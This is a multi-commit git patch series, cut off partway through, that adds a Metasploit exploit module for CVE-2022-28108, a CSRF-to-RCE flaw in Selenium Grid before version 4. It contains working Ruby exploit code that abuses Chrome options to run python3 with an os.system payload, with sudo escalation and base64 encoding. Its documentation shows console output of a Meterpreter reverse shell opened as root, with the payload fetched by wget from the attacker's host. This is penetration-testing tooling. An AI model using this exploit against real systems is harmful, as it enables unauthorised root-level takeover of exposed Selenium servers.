From 06af9b0b3d42550627e85a6808eae7eb3a779b08 Mon Sep 17 00:00:00 2001 From: Takah1ro Date: Thu, 26 Dec 2024 23:44:11 +0900 Subject: [PATCH 01/23] Add selenium chrome rce module --- Gemfile.lock | 8 ++ ...elenium_greed_chrome_rce_cve_2022_28108.md | 116 ++++++++++++++++++ metasploit-framework.gemspec | 3 + ...elenium_greed_chrome_rce_cve_2022_28108.rb | 102 +++++++++++++++ 4 files changed, 229 insertions(+) create mode 100644 documentation/modules/exploit/linux/http/selenium_greed_chrome_rce_cve_2022_28108.md create mode 100644 modules/exploits/linux/http/selenium_greed_chrome_rce_cve_2022_28108.rb diff --git a/Gemfile.lock b/Gemfile.lock index 5174f68c4e4d..eca9eac6b202 100644 --- a/Gemfile.lock +++ b/Gemfile.lock @@ -95,6 +95,7 @@ PATH ruby_smb (~> 3.3.3) rubyntlm rubyzip + selenium-webdriver (~> 4.27) sinatra sqlite3 (= 1.7.3) sshkey @@ -511,6 +512,12 @@ GEM sawyer (0.9.2) addressable (>= 2.3.5) faraday (>= 0.17.3, < 3) + selenium-webdriver (4.27.0) + base64 (~> 0.2) + logger (~> 1.4) + rexml (~> 3.2, >= 3.2.5) + rubyzip (>= 1.2.2, < 3.0) + websocket (~> 1.0) simplecov (0.18.2) docile (~> 1.1) simplecov-html (~> 0.11) @@ -549,6 +556,7 @@ GEM warden (1.2.9) rack (>= 2.0.9) webrick (1.8.2) + websocket (1.2.11) websocket-driver (0.7.6) websocket-extensions (>= 0.1.0) websocket-extensions (0.1.5) diff --git a/documentation/modules/exploit/linux/http/selenium_greed_chrome_rce_cve_2022_28108.md b/documentation/modules/exploit/linux/http/selenium_greed_chrome_rce_cve_2022_28108.md new file mode 100644 index 000000000000..459ad879f940 --- /dev/null +++ b/documentation/modules/exploit/linux/http/selenium_greed_chrome_rce_cve_2022_28108.md @@ -0,0 +1,116 @@ +## Vulnerable Application + +Selenium Server (Grid) before 4 allows CSRF because it permits non-JSON content types +such as application/x-www-form-urlencoded, multipart/form-data, and text/plain. + +The vulnerability affects: + + * Selenium Server (Grid) before 4 + +This module was successfully tested on: + + * selenium/standalone-chrome:3.141.59 installed with Docker on Ubuntu 24.0.4 + + +### Installation + +1. docker pull selenium/standalone-chrome:3.141.59 + +2. docker run -d -p 4444:4444 -p 7900:7900 --shm-size="2g" selenium/standalone-chrome:3.141.59 + + +## Verification Steps + +1. Install the application +2. Start msfconsole +3. Do: `use exploit/linux/http/selenium_greed_chrome_rce_cve_2022_28108` +4. Do: `run lhost= rhost=` +5. You should get a meterpreter + + +## Options + + +## Scenarios +``` +msf6 > use exploit/linux/http/selenium_greed_chrome_rce_cve_2022_28108 +[*] Using configured payload cmd/linux/http/x64/meterpreter_reverse_tcp +msf6 exploit(linux/http/selenium_greed_chrome_rce_cve_2022_28108) > options + +Module options (exploit/linux/http/selenium_greed_chrome_rce_cve_2022_28108): + + Name Current Setting Required Description + ---- --------------- -------- ----------- + Proxies no A proxy chain of format type:host:port[,type:host:port][...] + RHOSTS yes The target host(s), see https://docs.metasploit.com/docs/using-metasploit/basics/using-metasploit.html + RPORT 4444 yes The target port (TCP) + SSL false no Negotiate SSL/TLS for outgoing connections + VHOST no HTTP server virtual host + + +Payload options (cmd/linux/http/x64/meterpreter_reverse_tcp): + + Name Current Setting Required Description + ---- --------------- -------- ----------- + FETCH_COMMAND WGET yes Command to fetch payload (Accepted: CURL, FTP, TFTP, TNFTP, WGET) + FETCH_DELETE false yes Attempt to delete the binary after execution + FETCH_FILENAME JCDnGOMpY no Name to use on remote system when storing payload; cannot contain spaces or slashes + FETCH_SRVHOST no Local IP to use for serving payload + FETCH_SRVPORT 8080 yes Local port to use for serving payload + FETCH_URIPATH no Local URI to use for serving payload + FETCH_WRITABLE_DIR yes Remote writable dir to store payload; cannot contain spaces + LHOST yes The listen address (an interface may be specified) + LPORT 4444 yes The listen port + + +Exploit target: + + Id Name + -- ---- + 0 Linux Command + + + +View the full module info with the info, or info -d command. + +msf6 exploit(linux/http/selenium_greed_chrome_rce_cve_2022_28108) > run lhost=192.168.56.1 rhost=192.168.56.16 + +[*] Started reverse TCP handler on 192.168.56.1:4444 +[*] Running automatic check ("set AutoCheck false" to disable) +[+] The target appears to be vulnerable. +[*] Expected error: unknown error: Chrome failed to start: exited normally. + (unknown error: DevToolsActivePort file doesn't exist) + (The process started from chrome location /usr/bin/python3 is no longer running, so ChromeDriver is assuming that Chrome has crashed.) +Build info: version: '3.141.59', revision: 'e82be7d358', time: '2018-11-14T08:25:53' +System info: host: 'e270e1bda998', ip: '172.17.0.2', os.name: 'Linux', os.arch: 'amd64', os.version: '6.8.0-51-generic', java.version: '1.8.0_292' +Driver info: driver.version: unknown +remote stacktrace: #0 0x5b8e0fc708f3 +#1 0x5b8e0f755ba8 +#2 0x5b8e0f778e33 +#3 0x5b8e0f7749ef +#4 0x5b8e0f7ae995 +#5 0x5b8e0f7a8d63 +#6 0x5b8e0f77f144 +#7 0x5b8e0f780135 +#8 0x5b8e0fc9fc3e +#9 0x5b8e0fcb56b7 +#10 0x5b8e0fca0b95 +#11 0x5b8e0fcb6b05 +#12 0x5b8e0fc952ab +#13 0x5b8e0fcd1248 +#14 0x5b8e0fcd13c8 +#15 0x5b8e0fcec33d +#16 0x72fc781a7609 start_thread + +[*] Meterpreter session 1 opened (192.168.56.1:4444 -> 192.168.56.16:50038) at 2024-12-26 23:30:24 +0900 + +meterpreter > getuid +Server username: root +meterpreter > sysinfo +Computer : 172.17.0.2 +OS : Ubuntu 20.04 (Linux 6.8.0-51-generic) +Architecture : x64 +BuildTuple : x86_64-linux-musl +Meterpreter : x64/linux +meterpreter > +``` diff --git a/metasploit-framework.gemspec b/metasploit-framework.gemspec index b2025223fe7c..4e3899b9ec82 100644 --- a/metasploit-framework.gemspec +++ b/metasploit-framework.gemspec @@ -254,6 +254,9 @@ Gem::Specification.new do |spec| # Needed to parse sections of ELF files in order to retrieve symbols spec.add_runtime_dependency 'elftools' + # Needed for Selenium + spec.add_runtime_dependency 'selenium-webdriver', '~> 4.27' + # Standard libraries: https://www.ruby-lang.org/en/news/2023/12/25/ruby-3-3-0-released/ %w[ abbrev diff --git a/modules/exploits/linux/http/selenium_greed_chrome_rce_cve_2022_28108.rb b/modules/exploits/linux/http/selenium_greed_chrome_rce_cve_2022_28108.rb new file mode 100644 index 000000000000..424e40aacd34 --- /dev/null +++ b/modules/exploits/linux/http/selenium_greed_chrome_rce_cve_2022_28108.rb @@ -0,0 +1,102 @@ +## +# This module requires Metasploit: https://metasploit.com/download +# Current source: https://github.com/rapid7/metasploit-framework +## + +require 'selenium-webdriver' + +class MetasploitModule < Msf::Exploit::Remote + Rank = ExcellentRanking + + include Msf::Exploit::Remote::HttpClient + prepend Msf::Exploit::Remote::AutoCheck + + def initialize(info = {}) + super( + update_info( + info, + 'Name' => 'Selenium chrome RCE', + 'Description' => %q{ + Selenium Server (Grid) before 4 allows CSRF because it permits non-JSON content types + such as application/x-www-form-urlencoded, multipart/form-data, and text/plain. + }, + 'Author' => [ + 'Wiz Research', # Vulnerability research + 'Takahiro Yokoyama' # Metasploit module + ], + 'License' => MSF_LICENSE, + 'References' => [ + ['CVE', 'CVE-2022-28108'], + ['URL', 'https://www.wiz.io/blog/seleniumgreed-cryptomining-exploit-attack-flow-remediation-steps'], + ['URL', 'https://www.gabriel.urdhr.fr/2022/02/07/selenium-standalone-server-csrf-dns-rebinding-rce/'], + ['URL', 'https://www.exploit-db.com/exploits/49915'], + ], + 'Payload' => { + 'DisableNops' => true + }, + 'Platform' => %w[linux], + 'Targets' => [ + [ + 'Linux Command', { + 'Arch' => [ ARCH_CMD ], 'Platform' => [ 'unix', 'linux' ], 'Type' => :nix_cmd, + 'DefaultOptions' => { + 'PAYLOAD' => 'cmd/linux/http/x64/meterpreter_reverse_tcp', + 'FETCH_COMMAND' => 'WGET' + } + } + ], + ], + 'DefaultTarget' => 0, + 'DisclosureDate' => '2022-04-18', + 'Notes' => { + 'Stability' => [ CRASH_SAFE, ], + 'SideEffects' => [ ARTIFACTS_ON_DISK, IOC_IN_LOGS ], + 'Reliability' => [ REPEATABLE_SESSION, ] + } + ) + ) + register_options( + [ + Opt::RPORT(4444), + ] + ) + end + + def check + res = send_request_cgi({ + 'method' => 'GET', + 'uri' => normalize_uri(target_uri.path) + }) + return Exploit::CheckCode::Unknown unless res&.code == 200 + + json_string = res.get_html_document.xpath('//*[@class="se-version"]')&.text + return Exploit::CheckCode::Unknown unless json_string + + # Extract the version + version = Rex::Version.new(json_string) + return Exploit::CheckCode::Unknown unless version + + return Exploit::CheckCode::Safe if Rex::Version.new('4.0.1') <= version + + return Exploit::CheckCode::Safe if version == Rex::Version.new('4.0.0-alpha-7') + + Exploit::CheckCode::Appears + end + + def exploit + remote_url = full_uri(normalize_uri(target_uri.path, 'wd/hub')) + # Set up Chrome options + chrome_options = Selenium::WebDriver::Chrome::Options.new + chrome_options.binary = '/usr/bin/python3' + sudo_payload = 'sudo su root -c "' + payload.encoded + '"' + chrome_options.add_argument("-cimport os; os.system('#{sudo_payload}')") + + begin + # Initialize the driver with the remote WebDriver URL and options + Selenium::WebDriver.for :remote, url: remote_url, capabilities: chrome_options + rescue Selenium::WebDriver::Error::UnknownError => e + print_status("Expected error: #{e}") + end + end + +end From acbcd9f3b1da9d5b13aea670bb1bf1e7edce65a4 Mon Sep 17 00:00:00 2001 From: Takah1ro Date: Thu, 26 Dec 2024 23:51:40 +0900 Subject: [PATCH 02/23] Fix ubuntu version --- .../linux/http/selenium_greed_chrome_rce_cve_2022_28108.md | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/documentation/modules/exploit/linux/http/selenium_greed_chrome_rce_cve_2022_28108.md b/documentation/modules/exploit/linux/http/selenium_greed_chrome_rce_cve_2022_28108.md index 459ad879f940..86eafd7e3f12 100644 --- a/documentation/modules/exploit/linux/http/selenium_greed_chrome_rce_cve_2022_28108.md +++ b/documentation/modules/exploit/linux/http/selenium_greed_chrome_rce_cve_2022_28108.md @@ -9,7 +9,7 @@ The vulnerability affects: This module was successfully tested on: - * selenium/standalone-chrome:3.141.59 installed with Docker on Ubuntu 24.0.4 + * selenium/standalone-chrome:3.141.59 installed with Docker on Ubuntu 20.0.4 ### Installation From 82ebdf1f9d010172673447b65cdcd464ef849be5 Mon Sep 17 00:00:00 2001 From: Takah1ro Date: Thu, 26 Dec 2024 23:54:47 +0900 Subject: [PATCH 03/23] Improve docs --- .../linux/http/selenium_greed_chrome_rce_cve_2022_28108.md | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/documentation/modules/exploit/linux/http/selenium_greed_chrome_rce_cve_2022_28108.md b/documentation/modules/exploit/linux/http/selenium_greed_chrome_rce_cve_2022_28108.md index 86eafd7e3f12..a6f8fc64c9c6 100644 --- a/documentation/modules/exploit/linux/http/selenium_greed_chrome_rce_cve_2022_28108.md +++ b/documentation/modules/exploit/linux/http/selenium_greed_chrome_rce_cve_2022_28108.md @@ -14,9 +14,9 @@ This module was successfully tested on: ### Installation -1. docker pull selenium/standalone-chrome:3.141.59 +1. `docker pull selenium/standalone-chrome:3.141.59` -2. docker run -d -p 4444:4444 -p 7900:7900 --shm-size="2g" selenium/standalone-chrome:3.141.59 +2. `docker run -d -p 4444:4444 -p 7900:7900 --shm-size="2g" selenium/standalone-chrome:3.141.59` ## Verification Steps From 3defb637630f3c7b1180b529066b0a1629f84e3f Mon Sep 17 00:00:00 2001 From: Takah1ro Date: Thu, 26 Dec 2024 23:57:41 +0900 Subject: [PATCH 04/23] Fix CVE format --- .../linux/http/selenium_greed_chrome_rce_cve_2022_28108.rb | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/modules/exploits/linux/http/selenium_greed_chrome_rce_cve_2022_28108.rb b/modules/exploits/linux/http/selenium_greed_chrome_rce_cve_2022_28108.rb index 424e40aacd34..27b2734ddbc0 100644 --- a/modules/exploits/linux/http/selenium_greed_chrome_rce_cve_2022_28108.rb +++ b/modules/exploits/linux/http/selenium_greed_chrome_rce_cve_2022_28108.rb @@ -26,7 +26,7 @@ def initialize(info = {}) ], 'License' => MSF_LICENSE, 'References' => [ - ['CVE', 'CVE-2022-28108'], + ['CVE', '2022-28108'], ['URL', 'https://www.wiz.io/blog/seleniumgreed-cryptomining-exploit-attack-flow-remediation-steps'], ['URL', 'https://www.gabriel.urdhr.fr/2022/02/07/selenium-standalone-server-csrf-dns-rebinding-rce/'], ['URL', 'https://www.exploit-db.com/exploits/49915'], From 390f551df7ef1372e4c0fdef464f60f5810102c1 Mon Sep 17 00:00:00 2001 From: Takah1ro Date: Fri, 27 Dec 2024 00:10:01 +0900 Subject: [PATCH 05/23] Fix EDB --- .../linux/http/selenium_greed_chrome_rce_cve_2022_28108.rb | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/modules/exploits/linux/http/selenium_greed_chrome_rce_cve_2022_28108.rb b/modules/exploits/linux/http/selenium_greed_chrome_rce_cve_2022_28108.rb index 27b2734ddbc0..a27c3e96e011 100644 --- a/modules/exploits/linux/http/selenium_greed_chrome_rce_cve_2022_28108.rb +++ b/modules/exploits/linux/http/selenium_greed_chrome_rce_cve_2022_28108.rb @@ -29,7 +29,7 @@ def initialize(info = {}) ['CVE', '2022-28108'], ['URL', 'https://www.wiz.io/blog/seleniumgreed-cryptomining-exploit-attack-flow-remediation-steps'], ['URL', 'https://www.gabriel.urdhr.fr/2022/02/07/selenium-standalone-server-csrf-dns-rebinding-rce/'], - ['URL', 'https://www.exploit-db.com/exploits/49915'], + ['EDB', '49915'], ], 'Payload' => { 'DisableNops' => true From 64b183256707a7849ae73c27c55049aab20eeeeb Mon Sep 17 00:00:00 2001 From: Takah1ro Date: Fri, 27 Dec 2024 13:00:20 +0900 Subject: [PATCH 06/23] Update not to use selenium-webdriver --- Gemfile.lock | 8 ----- ...elenium_greed_chrome_rce_cve_2022_28108.md | 29 ++-------------- metasploit-framework.gemspec | 3 -- ...elenium_greed_chrome_rce_cve_2022_28108.rb | 34 ++++++++++++------- 4 files changed, 23 insertions(+), 51 deletions(-) diff --git a/Gemfile.lock b/Gemfile.lock index eca9eac6b202..5174f68c4e4d 100644 --- a/Gemfile.lock +++ b/Gemfile.lock @@ -95,7 +95,6 @@ PATH ruby_smb (~> 3.3.3) rubyntlm rubyzip - selenium-webdriver (~> 4.27) sinatra sqlite3 (= 1.7.3) sshkey @@ -512,12 +511,6 @@ GEM sawyer (0.9.2) addressable (>= 2.3.5) faraday (>= 0.17.3, < 3) - selenium-webdriver (4.27.0) - base64 (~> 0.2) - logger (~> 1.4) - rexml (~> 3.2, >= 3.2.5) - rubyzip (>= 1.2.2, < 3.0) - websocket (~> 1.0) simplecov (0.18.2) docile (~> 1.1) simplecov-html (~> 0.11) @@ -556,7 +549,6 @@ GEM warden (1.2.9) rack (>= 2.0.9) webrick (1.8.2) - websocket (1.2.11) websocket-driver (0.7.6) websocket-extensions (>= 0.1.0) websocket-extensions (0.1.5) diff --git a/documentation/modules/exploit/linux/http/selenium_greed_chrome_rce_cve_2022_28108.md b/documentation/modules/exploit/linux/http/selenium_greed_chrome_rce_cve_2022_28108.md index a6f8fc64c9c6..ed6d933cef80 100644 --- a/documentation/modules/exploit/linux/http/selenium_greed_chrome_rce_cve_2022_28108.md +++ b/documentation/modules/exploit/linux/http/selenium_greed_chrome_rce_cve_2022_28108.md @@ -54,7 +54,7 @@ Payload options (cmd/linux/http/x64/meterpreter_reverse_tcp): ---- --------------- -------- ----------- FETCH_COMMAND WGET yes Command to fetch payload (Accepted: CURL, FTP, TFTP, TNFTP, WGET) FETCH_DELETE false yes Attempt to delete the binary after execution - FETCH_FILENAME JCDnGOMpY no Name to use on remote system when storing payload; cannot contain spaces or slashes + FETCH_FILENAME BxVpVxwUH no Name to use on remote system when storing payload; cannot contain spaces or slashes FETCH_SRVHOST no Local IP to use for serving payload FETCH_SRVPORT 8080 yes Local port to use for serving payload FETCH_URIPATH no Local URI to use for serving payload @@ -74,35 +74,10 @@ Exploit target: View the full module info with the info, or info -d command. msf6 exploit(linux/http/selenium_greed_chrome_rce_cve_2022_28108) > run lhost=192.168.56.1 rhost=192.168.56.16 - [*] Started reverse TCP handler on 192.168.56.1:4444 [*] Running automatic check ("set AutoCheck false" to disable) [+] The target appears to be vulnerable. -[*] Expected error: unknown error: Chrome failed to start: exited normally. - (unknown error: DevToolsActivePort file doesn't exist) - (The process started from chrome location /usr/bin/python3 is no longer running, so ChromeDriver is assuming that Chrome has crashed.) -Build info: version: '3.141.59', revision: 'e82be7d358', time: '2018-11-14T08:25:53' -System info: host: 'e270e1bda998', ip: '172.17.0.2', os.name: 'Linux', os.arch: 'amd64', os.version: '6.8.0-51-generic', java.version: '1.8.0_292' -Driver info: driver.version: unknown -remote stacktrace: #0 0x5b8e0fc708f3 -#1 0x5b8e0f755ba8 -#2 0x5b8e0f778e33 -#3 0x5b8e0f7749ef -#4 0x5b8e0f7ae995 -#5 0x5b8e0f7a8d63 -#6 0x5b8e0f77f144 -#7 0x5b8e0f780135 -#8 0x5b8e0fc9fc3e -#9 0x5b8e0fcb56b7 -#10 0x5b8e0fca0b95 -#11 0x5b8e0fcb6b05 -#12 0x5b8e0fc952ab -#13 0x5b8e0fcd1248 -#14 0x5b8e0fcd13c8 -#15 0x5b8e0fcec33d -#16 0x72fc781a7609 start_thread - -[*] Meterpreter session 1 opened (192.168.56.1:4444 -> 192.168.56.16:50038) at 2024-12-26 23:30:24 +0900 +[*] Meterpreter session 1 opened (192.168.56.1:4444 -> 192.168.56.16:60042) at 2024-12-27 12:58:15 +0900 meterpreter > getuid Server username: root diff --git a/metasploit-framework.gemspec b/metasploit-framework.gemspec index 4e3899b9ec82..b2025223fe7c 100644 --- a/metasploit-framework.gemspec +++ b/metasploit-framework.gemspec @@ -254,9 +254,6 @@ Gem::Specification.new do |spec| # Needed to parse sections of ELF files in order to retrieve symbols spec.add_runtime_dependency 'elftools' - # Needed for Selenium - spec.add_runtime_dependency 'selenium-webdriver', '~> 4.27' - # Standard libraries: https://www.ruby-lang.org/en/news/2023/12/25/ruby-3-3-0-released/ %w[ abbrev diff --git a/modules/exploits/linux/http/selenium_greed_chrome_rce_cve_2022_28108.rb b/modules/exploits/linux/http/selenium_greed_chrome_rce_cve_2022_28108.rb index a27c3e96e011..5b324b1055e8 100644 --- a/modules/exploits/linux/http/selenium_greed_chrome_rce_cve_2022_28108.rb +++ b/modules/exploits/linux/http/selenium_greed_chrome_rce_cve_2022_28108.rb @@ -3,8 +3,6 @@ # Current source: https://github.com/rapid7/metasploit-framework ## -require 'selenium-webdriver' - class MetasploitModule < Msf::Exploit::Remote Rank = ExcellentRanking @@ -84,19 +82,29 @@ def check end def exploit - remote_url = full_uri(normalize_uri(target_uri.path, 'wd/hub')) - # Set up Chrome options - chrome_options = Selenium::WebDriver::Chrome::Options.new - chrome_options.binary = '/usr/bin/python3' + url = URI.parse(full_uri(normalize_uri(target_uri.path, 'wd/hub/session'))) + sudo_payload = 'sudo su root -c "' + payload.encoded + '"' - chrome_options.add_argument("-cimport os; os.system('#{sudo_payload}')") + # Create the request body as a Ruby hash and then convert it to JSON + body = { + 'capabilities' => { + 'alwaysMatch' => { + 'browserName' => 'chrome', + 'goog:chromeOptions' => { + 'binary' => '/usr/bin/python3', + 'args' => ["-cimport os; os.system('#{sudo_payload}')"] + } + } + } + }.to_json + + # Set up the HTTP request + request = Net::HTTP::Post.new(url.path, { 'Content-Type' => 'text/plain' }) + request.body = body - begin - # Initialize the driver with the remote WebDriver URL and options - Selenium::WebDriver.for :remote, url: remote_url, capabilities: chrome_options - rescue Selenium::WebDriver::Error::UnknownError => e - print_status("Expected error: #{e}") - end + # Make the HTTP request (with no-cors mode implied) + http = Net::HTTP.new(url.host, url.port) + http.request(request) end end From e17d7cd161300e458b16bd9985b88afe8a6d6f6b Mon Sep 17 00:00:00 2001 From: Takah1ro Date: Fri, 27 Dec 2024 21:50:26 +0900 Subject: [PATCH 07/23] Minor fix --- .../http/selenium_greed_chrome_rce_cve_2022_28108.rb | 10 +++++++--- 1 file changed, 7 insertions(+), 3 deletions(-) diff --git a/modules/exploits/linux/http/selenium_greed_chrome_rce_cve_2022_28108.rb b/modules/exploits/linux/http/selenium_greed_chrome_rce_cve_2022_28108.rb index 5b324b1055e8..f323ddd0e571 100644 --- a/modules/exploits/linux/http/selenium_greed_chrome_rce_cve_2022_28108.rb +++ b/modules/exploits/linux/http/selenium_greed_chrome_rce_cve_2022_28108.rb @@ -3,6 +3,10 @@ # Current source: https://github.com/rapid7/metasploit-framework ## +require 'net/http' +require 'uri' +require 'json' + class MetasploitModule < Msf::Exploit::Remote Rank = ExcellentRanking @@ -67,11 +71,11 @@ def check }) return Exploit::CheckCode::Unknown unless res&.code == 200 - json_string = res.get_html_document.xpath('//*[@class="se-version"]')&.text - return Exploit::CheckCode::Unknown unless json_string + raw_version = res.get_html_document.xpath('//*[@class="se-version"]')&.text + return Exploit::CheckCode::Unknown unless raw_version # Extract the version - version = Rex::Version.new(json_string) + version = Rex::Version.new(raw_version) return Exploit::CheckCode::Unknown unless version return Exploit::CheckCode::Safe if Rex::Version.new('4.0.1') <= version From 38e886f4b6cfa105f443268e3518cc8e016a3a7f Mon Sep 17 00:00:00 2001 From: Takah1ro Date: Fri, 27 Dec 2024 21:58:42 +0900 Subject: [PATCH 08/23] Update payload string formatting --- .../linux/http/selenium_greed_chrome_rce_cve_2022_28108.rb | 3 +-- 1 file changed, 1 insertion(+), 2 deletions(-) diff --git a/modules/exploits/linux/http/selenium_greed_chrome_rce_cve_2022_28108.rb b/modules/exploits/linux/http/selenium_greed_chrome_rce_cve_2022_28108.rb index f323ddd0e571..6a6cb44cc5ed 100644 --- a/modules/exploits/linux/http/selenium_greed_chrome_rce_cve_2022_28108.rb +++ b/modules/exploits/linux/http/selenium_greed_chrome_rce_cve_2022_28108.rb @@ -88,7 +88,6 @@ def check def exploit url = URI.parse(full_uri(normalize_uri(target_uri.path, 'wd/hub/session'))) - sudo_payload = 'sudo su root -c "' + payload.encoded + '"' # Create the request body as a Ruby hash and then convert it to JSON body = { 'capabilities' => { @@ -96,7 +95,7 @@ def exploit 'browserName' => 'chrome', 'goog:chromeOptions' => { 'binary' => '/usr/bin/python3', - 'args' => ["-cimport os; os.system('#{sudo_payload}')"] + 'args' => ["-cimport os; os.system('sudo su root -c \"#{payload.encoded}\"')"] } } } From e3d68d41648e27fb9f557e7f30f1b7276bf3c3dd Mon Sep 17 00:00:00 2001 From: Takah1ro Date: Sat, 28 Dec 2024 11:18:41 +0900 Subject: [PATCH 09/23] Update author and fix version detection --- ...elenium_greed_chrome_rce_cve_2022_28108.md | 5 ++-- ...elenium_greed_chrome_rce_cve_2022_28108.rb | 25 +++++++++++-------- 2 files changed, 17 insertions(+), 13 deletions(-) diff --git a/documentation/modules/exploit/linux/http/selenium_greed_chrome_rce_cve_2022_28108.md b/documentation/modules/exploit/linux/http/selenium_greed_chrome_rce_cve_2022_28108.md index ed6d933cef80..5bf8b097ecd6 100644 --- a/documentation/modules/exploit/linux/http/selenium_greed_chrome_rce_cve_2022_28108.md +++ b/documentation/modules/exploit/linux/http/selenium_greed_chrome_rce_cve_2022_28108.md @@ -54,7 +54,7 @@ Payload options (cmd/linux/http/x64/meterpreter_reverse_tcp): ---- --------------- -------- ----------- FETCH_COMMAND WGET yes Command to fetch payload (Accepted: CURL, FTP, TFTP, TNFTP, WGET) FETCH_DELETE false yes Attempt to delete the binary after execution - FETCH_FILENAME BxVpVxwUH no Name to use on remote system when storing payload; cannot contain spaces or slashes + FETCH_FILENAME KPrNrswF no Name to use on remote system when storing payload; cannot contain spaces or slashes FETCH_SRVHOST no Local IP to use for serving payload FETCH_SRVPORT 8080 yes Local port to use for serving payload FETCH_URIPATH no Local URI to use for serving payload @@ -76,8 +76,9 @@ View the full module info with the info, or info -d command. msf6 exploit(linux/http/selenium_greed_chrome_rce_cve_2022_28108) > run lhost=192.168.56.1 rhost=192.168.56.16 [*] Started reverse TCP handler on 192.168.56.1:4444 [*] Running automatic check ("set AutoCheck false" to disable) +[*] Version 3.141.59 detected, which is vulnerable [+] The target appears to be vulnerable. -[*] Meterpreter session 1 opened (192.168.56.1:4444 -> 192.168.56.16:60042) at 2024-12-27 12:58:15 +0900 +[*] Meterpreter session 1 opened (192.168.56.1:4444 -> 192.168.56.16:58562) at 2024-12-28 11:15:06 +0900 meterpreter > getuid Server username: root diff --git a/modules/exploits/linux/http/selenium_greed_chrome_rce_cve_2022_28108.rb b/modules/exploits/linux/http/selenium_greed_chrome_rce_cve_2022_28108.rb index 6a6cb44cc5ed..a0b98201a3e5 100644 --- a/modules/exploits/linux/http/selenium_greed_chrome_rce_cve_2022_28108.rb +++ b/modules/exploits/linux/http/selenium_greed_chrome_rce_cve_2022_28108.rb @@ -23,15 +23,15 @@ def initialize(info = {}) such as application/x-www-form-urlencoded, multipart/form-data, and text/plain. }, 'Author' => [ - 'Wiz Research', # Vulnerability research - 'Takahiro Yokoyama' # Metasploit module + 'randomstuff (Gabriel Corona)', # Exploit development + 'Wiz Research', # Vulnerability research + 'Takahiro Yokoyama' # Metasploit module ], 'License' => MSF_LICENSE, 'References' => [ ['CVE', '2022-28108'], ['URL', 'https://www.wiz.io/blog/seleniumgreed-cryptomining-exploit-attack-flow-remediation-steps'], ['URL', 'https://www.gabriel.urdhr.fr/2022/02/07/selenium-standalone-server-csrf-dns-rebinding-rce/'], - ['EDB', '49915'], ], 'Payload' => { 'DisableNops' => true @@ -71,17 +71,20 @@ def check }) return Exploit::CheckCode::Unknown unless res&.code == 200 - raw_version = res.get_html_document.xpath('//*[@class="se-version"]')&.text - return Exploit::CheckCode::Unknown unless raw_version + js_code = res.get_html_document.css('script').find { |script| script.text.match(/var json = Object.freeze\('(.*?)'\);/) } + return Exploit::CheckCode::Unknown unless js_code - # Extract the version - version = Rex::Version.new(raw_version) - return Exploit::CheckCode::Unknown unless version - - return Exploit::CheckCode::Safe if Rex::Version.new('4.0.1') <= version + json_str = js_code.text.match(/var json = Object.freeze\('(.*?)'\);/)[1] + json_data = JSON.parse(json_str) + return Exploit::CheckCode::Unknown unless json_data && json_data.include?('version') && json_data['version'] - return Exploit::CheckCode::Safe if version == Rex::Version.new('4.0.0-alpha-7') + # Extract the version + version = Rex::Version.new(json_data['version']) + if version == Rex::Version.new('4.0.0-alpha-7') || Rex::Version.new('4.0.1') <= version + return Exploit::CheckCode::Safe("Version #{version} detected, which is not vulnerable") + end + print_status("Version #{version} detected, which is vulnerable") Exploit::CheckCode::Appears end From 6c5952d3b6b5563c47657c04c2f85974cc2e5163 Mon Sep 17 00:00:00 2001 From: Takah1ro Date: Sat, 28 Dec 2024 13:34:10 +0900 Subject: [PATCH 10/23] Use send_request_cgi --- ...elenium_greed_chrome_rce_cve_2022_28108.rb | 19 ++++++------------- 1 file changed, 6 insertions(+), 13 deletions(-) diff --git a/modules/exploits/linux/http/selenium_greed_chrome_rce_cve_2022_28108.rb b/modules/exploits/linux/http/selenium_greed_chrome_rce_cve_2022_28108.rb index a0b98201a3e5..e79745e1d997 100644 --- a/modules/exploits/linux/http/selenium_greed_chrome_rce_cve_2022_28108.rb +++ b/modules/exploits/linux/http/selenium_greed_chrome_rce_cve_2022_28108.rb @@ -3,10 +3,6 @@ # Current source: https://github.com/rapid7/metasploit-framework ## -require 'net/http' -require 'uri' -require 'json' - class MetasploitModule < Msf::Exploit::Remote Rank = ExcellentRanking @@ -89,8 +85,6 @@ def check end def exploit - url = URI.parse(full_uri(normalize_uri(target_uri.path, 'wd/hub/session'))) - # Create the request body as a Ruby hash and then convert it to JSON body = { 'capabilities' => { @@ -104,13 +98,12 @@ def exploit } }.to_json - # Set up the HTTP request - request = Net::HTTP::Post.new(url.path, { 'Content-Type' => 'text/plain' }) - request.body = body - - # Make the HTTP request (with no-cors mode implied) - http = Net::HTTP.new(url.host, url.port) - http.request(request) + send_request_cgi({ + 'method' => 'POST', + 'uri' => normalize_uri(target_uri.path, 'wd/hub/session'), + 'headers' => { 'Content-Type' => 'text/plain' }, + 'data' => body + }) end end From 9bfccc429316c7b075f929a39ede5d4d1775bc75 Mon Sep 17 00:00:00 2001 From: Takah1ro Date: Sat, 28 Dec 2024 14:02:59 +0900 Subject: [PATCH 11/23] Review fix * add check if sudo without password possible * base64 encode payload --- .../http/selenium_greed_chrome_rce_cve_2022_28108.rb | 10 +++++++++- 1 file changed, 9 insertions(+), 1 deletion(-) diff --git a/modules/exploits/linux/http/selenium_greed_chrome_rce_cve_2022_28108.rb b/modules/exploits/linux/http/selenium_greed_chrome_rce_cve_2022_28108.rb index e79745e1d997..56f3efcecf01 100644 --- a/modules/exploits/linux/http/selenium_greed_chrome_rce_cve_2022_28108.rb +++ b/modules/exploits/linux/http/selenium_greed_chrome_rce_cve_2022_28108.rb @@ -85,6 +85,14 @@ def check end def exploit + b64encoded_payload = Rex::Text.encode_base64( + "if sudo -n true 2>/dev/null; then\n"\ + " sudo su root -c '#{payload.encoded}'\n"\ + "else\n"\ + " #{payload.encoded}\n"\ + "fi\n" + ) + # Create the request body as a Ruby hash and then convert it to JSON body = { 'capabilities' => { @@ -92,7 +100,7 @@ def exploit 'browserName' => 'chrome', 'goog:chromeOptions' => { 'binary' => '/usr/bin/python3', - 'args' => ["-cimport os; os.system('sudo su root -c \"#{payload.encoded}\"')"] + 'args' => ["-cimport base64,os; bp=b'#{b64encoded_payload}'; os.system(base64.b64decode(bp).decode())"] } } } From 7ecc1cb87ba5bcb57dbf7d46d31a7fcc44b4c612 Mon Sep 17 00:00:00 2001 